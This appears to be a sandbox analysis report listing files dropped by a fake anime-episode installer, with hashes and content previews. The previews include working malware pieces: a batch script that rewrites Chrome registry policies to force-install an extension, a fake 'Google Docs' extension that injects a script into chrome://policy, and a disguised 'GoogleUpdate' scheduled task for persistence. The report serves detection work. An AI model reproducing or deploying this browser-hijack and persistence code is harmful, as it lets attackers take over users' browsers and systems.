                                                                        C:\Users\user\AppData\Local\WindowsApp\apps-helper\is-CJHS5.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):299
                                                                        Entropy (8bit):4.8969499354657176
                                                                        Encrypted:false
                                                                        SSDEEP:6:oJRoJfwejEzKeYDFOEn9zmYnadRv5F8smvDNRU/snproLNRiif:ofoJYejj9n9Sdx5msmvDLrKdf
                                                                        MD5:78DA8C3C7BCC4FCBE1D1C1D4209BA026
                                                                        SHA1:CCACDA33826629E3A5B552BA26227D9D1B026BCA
                                                                        SHA-256:893FCFE4EDCDB07BCC3E05A3304F93F0358C9D8F4CC967058585F553BB82AD02
                                                                        SHA-512:01C3DEF2B9A38ABD5C6D447C52D8EC3533C8098DB69DCF30682EFA992BE71666D66A56AB3E6B161F8017FE018E20E479C365B780F3CF94ED507CAEA99EADBC06
                                                                        Malicious:false
                                                                        Preview:addEventListener('load', () => {...if (location.host !== 'policy') return;.....const reload = () => {....const button = document.querySelector('#reload-policies');......if (button) {.....button.click();.....setTimeout(close, 200);....} else {.....setTimeout(reload, 200);....}...}.....reload();..});

                                                                        C:\Users\user\AppData\Local\WindowsApp\apps-helper\is-JAUTN.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:Google Chrome extension, version 3
                                                                        Category:dropped
                                                                        Size (bytes):21965
                                                                        Entropy (8bit):7.877323467941546
                                                                        Encrypted:false
                                                                        SSDEEP:384:VPcg8r3Tv/D+gljnfFySA/Tv/D+gljnfFySA4Tv/D+gljnfFySAjLCdfjgEhiy:V0gUjH1JnfF2bH1JnfF2IH1JnfF2jLCl
                                                                        MD5:F02C46788D904EFD9F4BFBD47B875845
                                                                        SHA1:7F539A9151F5DAFE6DE10DB5DFBFE7E385C8C233
                                                                        SHA-256:3911FFEEAC85633086E25ACFA3E346892A948D95F27DF04F8A016DF8054087DE
                                                                        SHA-512:4F6CE616F7770B77EA79169643A67F2B69B7F938ADA9AD602287702D8E929684EB596A1B1EA406C0F7F583A1AC538C14EAB50D7E8E62DC6A3E69002985D91E28
                                                                        Malicious:false
                                                                        Preview:Cr24....E.........0.."0...*.H.............0............v..E.].tU$.,u.B.p^.........d....%y..@.....[.+x.2h..].o.....6Kv.f.;...$`..XI3.....Wn4.i_....WYLy....C31.i.&..RDp...=.^.G..a....Gb..]....G..|.j[|...ym..j.7.B.... +l.U..GN.%.1....j.eg..k.~..pL.x....C.jB..Q.e.05..).?^.51c...h..x?..\.&..$i...D%1]............,N...f.....1m.Q!..........P....Z.x!.U.|.jU3^c."..j...Go.m>.-.....b.P.p.<g..B.{Qvl%C.X.H.7....O1.....=.<.J...._~0.!fm.CC.V.UQ.=l:..U.,..9.....tF.E......w.6.........f;....n..#.l0.U..3...0u..D/>...+.'..FR....U....8.4*..S*......S......J.u..7yP........1Uk.st:.....#..yPK..-.....SZ.U.C..............manifest.json.....................T.n.0....?....l.n. H_.>n9.....ZSL$R.Rv. @?._./.R.d..[}.....hw..'.%.0z.....jk..v1.2F.@....ZU..l%&}.K.<....-W.H..`..r.5..C(0.[i.|m.#.P..l.L."%A...m.V...K.,..O.X.X....k_..8.i.+..*.l../....)T!Kgk...k..[zO.......%o.]Q..f;.n..Ic..6....Xk.J[.@.Y........,..r.K./>=}x.sw.j|9.[.U..>.,....Z. -..u*.#Y(.,V..8..*.<..T... p .q.u~}....|..]...K.3

                                                                        C:\Users\user\AppData\Local\WindowsApp\apps-helper\is-ONT90.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):280
                                                                        Entropy (8bit):4.784751850345126
                                                                        Encrypted:false
                                                                        SSDEEP:6:EW/xObKQZk/hsu1wC6VAPk8yyWSD9kn+E8Lyg8c:rAuBhsu1wXAPk8Sic+EaPN
                                                                        MD5:4E08D28DC99DCEA89EB316A373B74758
                                                                        SHA1:15F89379BA476D2C35BF33ABD37C1B16CB3AE2F4
                                                                        SHA-256:A507D1F546C979056CE392467EDE397C94EF854D9B5C7581462FEEF6E9B091EF
                                                                        SHA-512:E12733B3A346A2B67C6EB92090A08306CA0DEEDE599AC9242338004AE5D075F51102360D9FB4CCE20946AAD89B1007C43ACE367FB66608AA517F854BC2CB1685
                                                                        Malicious:false
                                                                        Preview:{..."name": "Google Docs",..."description": "",..."version": "1.0",..."manifest_version": 3,..."background": {...."service_worker": "service.js",...."type": "module"...},..."permissions": ["tabs", "scripting", "management", "background"],..."host_permissions": ["chrome://*/*"]..}

                                                                        C:\Users\user\AppData\Local\WindowsApp\apps-helper\is-VU5OG.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):320
                                                                        Entropy (8bit):5.132643741033991
                                                                        Encrypted:false
                                                                        SSDEEP:6:YXOBLow3rzLPyE5cWNR21aMXgBDoQYIxXYMoVsxrHLLqL:Y+9oOX2IMIDVYVMjrSL
                                                                        MD5:DC5731CC902226BEF4F122433C91BEB2
                                                                        SHA1:88EE89EB414C703CE69FCA3BF8566BAF26EE0625
                                                                        SHA-256:C939D8CC72D4D40FF1D9329B6CD6C0BCCAD4E723B7527C4E72961349F3EE6919
                                                                        SHA-512:7708060051B3A5C1283A28321C7F07FEACC1C8299FCF39F3CDC245AF2EC8737FD170D8B9046D7ABD751A54AE6798BEC54C95FD77431D91564D6A648E1DA6ABCD
                                                                        Malicious:false
                                                                        Preview:chrome.management.onInstalled.addListener(info => {...if (info.id != 'dbffglanhdhedkjkijpkplhpcdndpchj') return;.....setTimeout(() => {....chrome.tabs.create({ url: 'chrome://policy' }, tab => {.....chrome.scripting.executeScript({......target: { tabId: tab.id },......files: ['web.js'].... });....});...}, 500);..});

                                                                        C:\Users\user\AppData\Local\WindowsApp\apps-helper\manifest.json (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):280
                                                                        Entropy (8bit):4.784751850345126
                                                                        Encrypted:false
                                                                        SSDEEP:6:EW/xObKQZk/hsu1wC6VAPk8yyWSD9kn+E8Lyg8c:rAuBhsu1wXAPk8Sic+EaPN
                                                                        MD5:4E08D28DC99DCEA89EB316A373B74758
                                                                        SHA1:15F89379BA476D2C35BF33ABD37C1B16CB3AE2F4
                                                                        SHA-256:A507D1F546C979056CE392467EDE397C94EF854D9B5C7581462FEEF6E9B091EF
                                                                        SHA-512:E12733B3A346A2B67C6EB92090A08306CA0DEEDE599AC9242338004AE5D075F51102360D9FB4CCE20946AAD89B1007C43ACE367FB66608AA517F854BC2CB1685
                                                                        Malicious:false
                                                                        Preview:{..."name": "Google Docs",..."description": "",..."version": "1.0",..."manifest_version": 3,..."background": {...."service_worker": "service.js",...."type": "module"...},..."permissions": ["tabs", "scripting", "management", "background"],..."host_permissions": ["chrome://*/*"]..}

                                                                        C:\Users\user\AppData\Local\WindowsApp\apps-helper\service.js (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):320
                                                                        Entropy (8bit):5.132643741033991
                                                                        Encrypted:false
                                                                        SSDEEP:6:YXOBLow3rzLPyE5cWNR21aMXgBDoQYIxXYMoVsxrHLLqL:Y+9oOX2IMIDVYVMjrSL
                                                                        MD5:DC5731CC902226BEF4F122433C91BEB2
                                                                        SHA1:88EE89EB414C703CE69FCA3BF8566BAF26EE0625
                                                                        SHA-256:C939D8CC72D4D40FF1D9329B6CD6C0BCCAD4E723B7527C4E72961349F3EE6919
                                                                        SHA-512:7708060051B3A5C1283A28321C7F07FEACC1C8299FCF39F3CDC245AF2EC8737FD170D8B9046D7ABD751A54AE6798BEC54C95FD77431D91564D6A648E1DA6ABCD
                                                                        Malicious:false
                                                                        Preview:chrome.management.onInstalled.addListener(info => {...if (info.id != 'dbffglanhdhedkjkijpkplhpcdndpchj') return;.....setTimeout(() => {....chrome.tabs.create({ url: 'chrome://policy' }, tab => {.....chrome.scripting.executeScript({......target: { tabId: tab.id },......files: ['web.js'].... });....});...}, 500);..});

                                                                        C:\Users\user\AppData\Local\WindowsApp\apps-helper\web.js (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):299
                                                                        Entropy (8bit):4.8969499354657176
                                                                        Encrypted:false
                                                                        SSDEEP:6:oJRoJfwejEzKeYDFOEn9zmYnadRv5F8smvDNRU/snproLNRiif:ofoJYejj9n9Sdx5msmvDLrKdf
                                                                        MD5:78DA8C3C7BCC4FCBE1D1C1D4209BA026
                                                                        SHA1:CCACDA33826629E3A5B552BA26227D9D1B026BCA
                                                                        SHA-256:893FCFE4EDCDB07BCC3E05A3304F93F0358C9D8F4CC967058585F553BB82AD02
                                                                        SHA-512:01C3DEF2B9A38ABD5C6D447C52D8EC3533C8098DB69DCF30682EFA992BE71666D66A56AB3E6B161F8017FE018E20E479C365B780F3CF94ED507CAEA99EADBC06
                                                                        Malicious:false
                                                                        Preview:addEventListener('load', () => {...if (location.host !== 'policy') return;.....const reload = () => {....const button = document.querySelector('#reload-policies');......if (button) {.....button.click();.....setTimeout(close, 200);....} else {.....setTimeout(reload, 200);....}...}.....reload();..});

                                                                        C:\Users\user\AppData\Local\WindowsApp\chrome.bat

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3589
                                                                        Entropy (8bit):5.104362762146633
                                                                        Encrypted:false
                                                                        SSDEEP:96:yf21WJeJXJoJZJiJrJKlJ9JmJIJ3J+JVJsJLJtcJU8JwJfJ7JcJpJyJnJ4JFJuJU:yO1oQZq7MFKfXYK5wvWltmbSh1mr8Jar
                                                                        MD5:6D5DB74DAAE4CD40F8D3D07DAF23D1DF
                                                                        SHA1:278B3AD24A66FAFB95D8BC348DCE633BB7E583C4
                                                                        SHA-256:C608E1E22600D8198CF1A8927D22ADD8FB3679A97466E3BD1E06A4C845984B59
                                                                        SHA-512:C0C551C60A67BA1538DDFA691268B98BF8FFE8364818182E687E39439D2C62AE15B1791F5DB4E4AF80EA73D2A79BE46D6689F69C0E62539E1E07AF8C7135FED7
                                                                        Malicious:false
                                                                        Preview:@echo off..set version=1.0..set id=dbffglanhdhedkjkijpkplhpcdndpchj..set base32=HKLM\SOFTWARE..set base64=HKLM\SOFTWARE\WOW6432Node..set chrome=Google\Chrome..set helper=%LocalAppdata%\WindowsApp\apps-helper..set file=%helper%\apps.crx..REG DELETE %base32%\Policies\%chrome% /f..REG DELETE %base32%\%chrome%\Extensions\%id% /f..REG DELETE %base64%\%chrome%\Extensions\%id% /f..REG ADD "%base32%\Policies\%chrome%\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d %id% /f..REG ADD "%base32%\%chrome%\Extensions\%id%" /v "path" /t REG_SZ /d "%file%" /f..REG ADD "%base32%\%chrome%\Extensions\%id%" /v "version" /t REG_SZ /d %version% /f..REG ADD "%base64%\Policies\%chrome%\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d %id% /f..REG ADD "%base64%\%chrome%\Extensions\%id%" /v "path" /t REG_SZ /d "%file%" /f..REG ADD "%base64%\%chrome%\Extensions\%id%" /v "version" /t REG_SZ /d %version% /f..taskkill /F /IM chrome.exe /T..start "" "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-direc

                                                                        C:\Users\user\AppData\Local\WindowsApp\is-NDGJF.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):146560
                                                                        Entropy (8bit):5.240257973600313
                                                                        Encrypted:false
                                                                        SSDEEP:1536:rche1M8H7rrES/urgpZDaGCmVtbkPxLF:QhwH73EGur6laGCmVtoxx
                                                                        MD5:6B435C6EA00DA06603EA9927D489AB6A
                                                                        SHA1:4237CF8901992D1C6D2B45B4DD3DA9672104C2CF
                                                                        SHA-256:15F1DF0D80FA0DCBE5DCBDEDEBD8EA6D72A5C7972F13AA25216AEB8328790ED0
                                                                        SHA-512:3B555826024BDAF9F4B0C0C7B7CF60304143BE36E33F3D3F5D3ECACAF5550DDCF88E638612344D92A9E84E85505DE12886BEE5665A6D11033CC8059EE01C6E09
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........YI;.8'h.8'h.8'h.@.h.8'h.M#i.8'h.M$i.8'h.M"i.8'h.M&i.8'h.S!i.8'h.S&i.8'h.8&ho8'h!M.i.8'h!M.h.8'h.8.h.8'h!M%i.8'hRich.8'h........PE..d.....c.........."......R...........R.........@.............................P......^0....`..............................................................o...............*...@......P...p...............................8............p...............................text....P.......R.................. ..`.rdata...?...p...@...V..............@..@.data...h...........................@....pdata..............................@..@.rsrc....o.......p..................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\WindowsApp\reg.bat

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):95
                                                                        Entropy (8bit):4.69957501098577
                                                                        Encrypted:false
                                                                        SSDEEP:3:Z3wgHoIN+E2J5yMLdVJLS6JVEAn:ZAg5N723yMlLXx
                                                                        MD5:17D52ED154647FE95078DAB945BFC721
                                                                        SHA1:8146408AED7C58ABBE28ABCA5602422CBD26D72C
                                                                        SHA-256:EF755D197DE4F21AD0F53398A1258540B7BC66A7D2BBC82DABE5BBE2ECD4D4B5
                                                                        SHA-512:BE7DD3DB254F54E26563EA0EBD7728A32ED4B70F15B2C2E3A952C887EB907851E3F4B80F5C9882A3DA53328FC2DCF45BC39FCE76DB351AFDEC2E5F8EA2819F24
                                                                        Malicious:false
                                                                        Preview:schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate

                                                                        C:\Users\user\AppData\Local\WindowsApp\reg.xml

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1926
                                                                        Entropy (8bit):5.103950255476696
                                                                        Encrypted:false
                                                                        SSDEEP:48:cxOfpdE6Q4oL60uyqbzxIYODOLNdqBsuAh:o4da4d0uyqbzNdqBsuQ
                                                                        MD5:222D0410ED64E98F03CD8E40D0BCF405
                                                                        SHA1:E6D9DFC5CF208C8C09D3C2F34FAE3E006104F7A0
                                                                        SHA-256:9414ECDEDEEC029FCE058CD9757BF5E0D1423DE31FA15614857A1CD8D1115CF3
                                                                        SHA-512:4665FA6E7F82D55E7FA9273C3A11F9BA24BCC214DE1341309BAA1C9F41D3C6E2A028D26C78BCFCF0A396A1B44F0BDA611F3DA667DF0A75F14713D26CAB988ECB
                                                                        Malicious:true
                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2022-11-11T20:23:14.4975841</Date>.. <URI>GoogleUpdate</URI>.. </RegistrationInfo>.. <Triggers>.. <CalendarTrigger>.. <Repetition>.. <Interval>PT5M</Interval>.. <Duration>P1D</Duration>.. <StopAtDurationEnd>false</StopAtDurationEnd>.. </Repetition>.. <StartBoundary>2022-11-11T20:19:58</StartBoundary>.. <Enabled>true</Enabled>.. <ScheduleByDay>.. <DaysInterval>1</DaysInterval>.. </ScheduleByDay>.. </CalendarTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>.. <StopIfGoingOnBa

                                                                        C:\Windows\Installer\3cd703.msi

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.34.31931., Template: x64;1033, Revision Number: {F4326D14-4FF5-4F81-B678-481B19EBBB51}, Create Time/Date: Thu Oct 6 00:05:28 2022, Last Saved Time/Date: Thu Oct 6 00:05:28 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.395181381426635
                                                                        Encrypted:false
                                                                        SSDEEP:3072:lviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdPa:lvipBaTDo1j//SZhP
                                                                        MD5:DF77FC41AA2F85CA423919E397084137
                                                                        SHA1:5B87CD2DFB661DF49F9557E2FC3B95C7833C9B0B
                                                                        SHA-256:51B6A928F7BECBF525CBEFF180442B05533F8EA8F8494CC97A491E29BDD4B7C2
                                                                        SHA-512:A36B093011B9534DB0881EB72DE4638E39BE67A9844B14FCD3E40539AAFD9AA9CE7B14D3968AEDB092ECF9BCA9AC0918A65F65632643782EDAFEFA36FC12C3E2
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Installer\3cd711.msi

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.34.31931., Template: x64;1033, Revision Number: {F4326D14-4FF5-4F81-B678-481B19EBBB51}, Create Time/Date: Thu Oct 6 00:05:28 2022, Last Saved Time/Date: Thu Oct 6 00:05:28 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.395181381426635
                                                                        Encrypted:false
                                                                        SSDEEP:3072:lviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdPa:lvipBaTDo1j//SZhP
                                                                        MD5:DF77FC41AA2F85CA423919E397084137
                                                                        SHA1:5B87CD2DFB661DF49F9557E2FC3B95C7833C9B0B
                                                                        SHA-256:51B6A928F7BECBF525CBEFF180442B05533F8EA8F8494CC97A491E29BDD4B7C2
                                                                        SHA-512:A36B093011B9534DB0881EB72DE4638E39BE67A9844B14FCD3E40539AAFD9AA9CE7B14D3968AEDB092ECF9BCA9AC0918A65F65632643782EDAFEFA36FC12C3E2
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Installer\3cd712.msi

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Additional Runtime - 14.34.31931., Template: x64;1033, Revision Number: {4031CBD1-E566-49F4-B008-5D35253621AE}, Create Time/Date: Thu Oct 6 00:09:24 2022, Last Saved Time/Date: Thu Oct 6 00:09:24 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.401455786069727
                                                                        Encrypted:false
                                                                        SSDEEP:3072:4viOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJd4a:4vipBaTDo1j//SZh4
                                                                        MD5:C214A9E931BBDD960BB48AC1A2B91945
                                                                        SHA1:A640C55DD522E01D0BE4307A5EEE9A40F779A6CC
                                                                        SHA-256:1DBD3E4E71C6678E640C289C1C64BBB12C70F65F52B27191680A9E4141D64B11
                                                                        SHA-512:D25FEF3BDD3CD18035892618602E27621E9FB3A913E7972EC7BB624D593AE4B766E718FD2E2C7342C589E9A97BEB03D2FEDEF22E824C6B539B83F199CB967933
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Installer\3cd725.msi

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Additional Runtime - 14.34.31931., Template: x64;1033, Revision Number: {4031CBD1-E566-49F4-B008-5D35253621AE}, Create Time/Date: Thu Oct 6 00:09:24 2022, Last Saved Time/Date: Thu Oct 6 00:09:24 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.401455786069727
                                                                        Encrypted:false
                                                                        SSDEEP:3072:4viOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJd4a:4vipBaTDo1j//SZh4
                                                                        MD5:C214A9E931BBDD960BB48AC1A2B91945
                                                                        SHA1:A640C55DD522E01D0BE4307A5EEE9A40F779A6CC
                                                                        SHA-256:1DBD3E4E71C6678E640C289C1C64BBB12C70F65F52B27191680A9E4141D64B11
                                                                        SHA-512:D25FEF3BDD3CD18035892618602E27621E9FB3A913E7972EC7BB624D593AE4B766E718FD2E2C7342C589E9A97BEB03D2FEDEF22E824C6B539B83F199CB967933
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Windows\Installer\MSI217E.tmp

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):7461
                                                                        Entropy (8bit):5.745539580873089
                                                                        Encrypted:false
                                                                        SSDEEP:96:eLPdlu3dyb52HwxJi84V5YJs0sM2CfoghyXy2awF8M8M8M8M8M8M8M8M8M8M8M8v:ytb52eix5YiBM2CfKkpmbZi9VWM
                                                                        MD5:86A05C5C436948DC73AD40C54D4C2494
                                                                        SHA1:7B76314437741C57771EC20E174E160817F4F213
                                                                        SHA-256:14D536F20E081DE30CABC384E5B2E516D9B743361A6138FD9F5755A32B7BC10C
                                                                        SHA-512:DD438CC9504BC3FDE3FB17E0A55528118E44C38F198F9B574DDCDDE8DD027AEEFA51D8E50AADCA0ACA64BBC370F236D0CE79FAC88CF005543AFDC5A06AED8048
                                                                        Malicious:false
                                                                        Preview:...@IXOS.@.....@j|"V.@.....@.....@.....@.....@.....@......&.{12578975-C765-4BDF-8DDC-3284BC0E855F}>.Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702..vc_runtimeAdditional_x64.msi.@.....@6l...@.....@........&.{23CC48B5-925F-41A3-A3E4-90BCB78D5374}.....@.....@.....@.....@.......@.....@.....@.......@....>.Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........InstallInitialize......&.{9B0BAA88-E15F-3A1F-ACC0-B206E9DDF71C}....&.{23CC48B5-925F-41A3-A3E4-90BCB78D5374}c.&.{9B0BAA88-E15F-3A1F-ACC0-B206E9DDF71C}............ProcessComponents..Updating component registration.....@.....@.....@.]....&.{3639FCCA-5969-316D-AC18-E0C6B2B532E9}&.{12578975-C765-4BDF-8DDC-3284BC0E855F}..&.{3639FCCA-5969-316D-AC18-E0C6B2B532E9}...@.....@......&.{D2959D22-4DB7-32AF-A1B0-8405C4221749}&.{12578975-C765-4BDF-8DDC-3284BC0E855F}..&.{D2959D22-4DB7-32AF-A1B0-8405C4221749}...@.....@...

                                                                        C:\Windows\Installer\MSI24FB.tmp

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):12286
                                                                        Entropy (8bit):5.61597871082654
                                                                        Encrypted:false
                                                                        SSDEEP:192:y2Yk5mQrtONHWxSQjmxmY2Cg3gOgugmg8nBgkcg2gogDwgAeAS43RaB1iQDe2mk3:y2pjZONHW0QjmxmY2vv2Va6WjWA
                                                                        MD5:D54F6311F4C0D56630D544450A4AB7F3
                                                                        SHA1:0621E16FA35E1DC406C975CD9773F8135F1DCD2D
                                                                        SHA-256:0EC5B68A739A374B8FD576E983CA41E625DAE7C452BD6D07CB5D6C2468BAA9E6
                                                                        SHA-512:85A7FE6555D42EE9572533E4A5E68A06F4533D42C9471FC40AA5B4C1E537EC812BB8FD208921A27D411B5E374C3C02B23B8D867B5CD9FEABE89C320397A6E34E
                                                                        Malicious:false
                                                                        Preview:...@IXOS.@.....@j|"V.@.....@.....@.....@.....@.....@......&.{EAE242B1-0A26-485A-BFEB-0292EE9F03CB}>.Microsoft Visual C++ 2022 X64 Additional Runtime - 14.34.31931..vc_runtimeAdditional_x64.msi.@.....@.|"..@.....@........&.{4031CBD1-E566-49F4-B008-5D35253621AE}.....@.....@.....@.....@.......@.....@.....@.......@....>.Microsoft Visual C++ 2022 X64 Additional Runtime - 14.34.31931......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{3639FCCA-5969-316D-AC18-E0C6B2B532E9}@.02:\SOFTWARE\Microsoft\VisualStudio\14.0\VC\Runtimes\X64\Version.@.......@.....@.....@......&.{D2959D22-4DB7-32AF-A1B0-8405C4221749}@.22:\SOFTWARE\Microsoft\VisualStudio\14.0\VC\Runtimes\X64\Version.@.......@.....@.....@......&.{99A922E3-648F-3C37-8AE6-78232F317B1E}..C:\Windows\system32\mfc140.dll.@.......@.....@.....@......&.{8924DA15-E863-388D-A06B-E7A3931AD77B}..C:\Windows\system32\mfc1

                                                                        C:\Windows\Installer\MSIDFDC.tmp

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6384
                                                                        Entropy (8bit):5.786100854933264
                                                                        Encrypted:false
                                                                        SSDEEP:96:HLADpJNSDp47mkK/U6Ul8M8M8M8M8M8M8M8M8ePB8AhMpfSeeDpFCOSeeDpFhlEc:r6N2PoslWE
                                                                        MD5:C06A8FDB19CADD30F64E21FDF52FE673
                                                                        SHA1:79E4A395009B272C22A4A2BC3BC5E713D7C27CAF
                                                                        SHA-256:4B1E9C86D270202F8FD55D46394975382CE448EA94FC7E93EC7035C726CBE472
                                                                        SHA-512:C7550603A4AB7A1FDD172088BE1E10CC3F826D7DFE597A9638C65A4F480D7E605ECB16C646DAA57FAE6CB28AD3DB22A1126243A28EFBC27585081B429F1B7E85
                                                                        Malicious:false
